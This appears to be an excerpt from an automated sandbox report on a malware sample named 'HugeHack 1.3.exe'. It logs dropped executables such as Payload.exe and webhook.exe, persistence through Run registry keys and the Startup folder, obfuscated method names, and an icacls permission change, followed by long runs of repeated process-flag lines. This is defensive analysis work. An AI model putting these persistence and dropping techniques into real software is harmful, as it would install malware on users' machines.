Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Code function: 5_3_1520AA4C push eax; retf	5_3_1520AA4D
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Code function: 5_3_1520AA4C push eax; retf	5_3_1520AA4D
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Code function: 5_3_151FF8BF push eax; ret	5_3_151FF999
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Code function: 5_3_152082F0 push eax; ret	5_3_152082F1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Code function: 5_3_152082F0 push eax; ret	5_3_152082F1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Code function: 5_3_152058F0 push eax; ret	5_3_152058F1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Code function: 5_3_152058F0 push eax; ret	5_3_152058F1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Code function: 5_3_152CCAA6 push esp; retf	5_3_152CCAB5

Source: 16.2.dllhost.exe.2989240.1.raw.unpack, NNHeR8bFYh2LcEWSbx.cs	High entropy of concatenated method names: 'ce4DmfsmSrOT856tDgfrkMb', 'foONAXjG3I', 'sZWSGe5T9eymd', 'hCNSuhQpx', 'vdBMdA6DW', 'JtXWIGFkn', 'NsUOQ9nfG', 'memvMOjIl', 'qo4kGe9DR', 'n2ih4e3Jc'
Source: 16.2.dllhost.exe.a40000.0.raw.unpack, NNHeR8bFYh2LcEWSbx.cs	High entropy of concatenated method names: 'ce4DmfsmSrOT856tDgfrkMb', 'foONAXjG3I', 'sZWSGe5T9eymd', 'hCNSuhQpx', 'vdBMdA6DW', 'JtXWIGFkn', 'NsUOQ9nfG', 'memvMOjIl', 'qo4kGe9DR', 'n2ih4e3Jc'

Drops PE files

Source: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe	File created: C:\Users\user\AppData\Local\Temp\Payload.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	File created: C:\Users\user\AppData\Roaming\dllhost.exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\dllhost.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	File created: C:\ClickMe.exe	Jump to dropped file
Source: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe	File created: C:\Users\user\AppData\Local\Temp\webhook.exe	Jump to dropped file

Boot Survival

Creates autostart registry keys with suspicious names

Source: C:\Users\user\AppData\Roaming\dllhost.exe

Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run c382eb151c59bd833b24120723eac541

Drops PE files to the startup folder

Source: C:\Users\user\AppData\Roaming\dllhost.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe

Jump to dropped file

Creates a start menu entry (Start Menu\Programs\Startup)

Source: C:\Users\user\AppData\Roaming\dllhost.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe

Stores files to the Windows start menu directory

Source: C:\Users\user\AppData\Roaming\dllhost.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe

Source: C:\Users\user\AppData\Roaming\dllhost.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run c382eb151c59bd833b24120723eac541
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run c382eb151c59bd833b24120723eac541
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run c382eb151c59bd833b24120723eac541
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run c382eb151c59bd833b24120723eac541

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Stores large binary data to the registry

Source: C:\Users\user\AppData\Roaming\dllhost.exe

Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\c382eb151c59bd833b24120723eac541 f55ab6fb12b43f7934c631eabc315fb4

Uses cacls to modify the permissions of files

Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe

Process created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M

Source: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
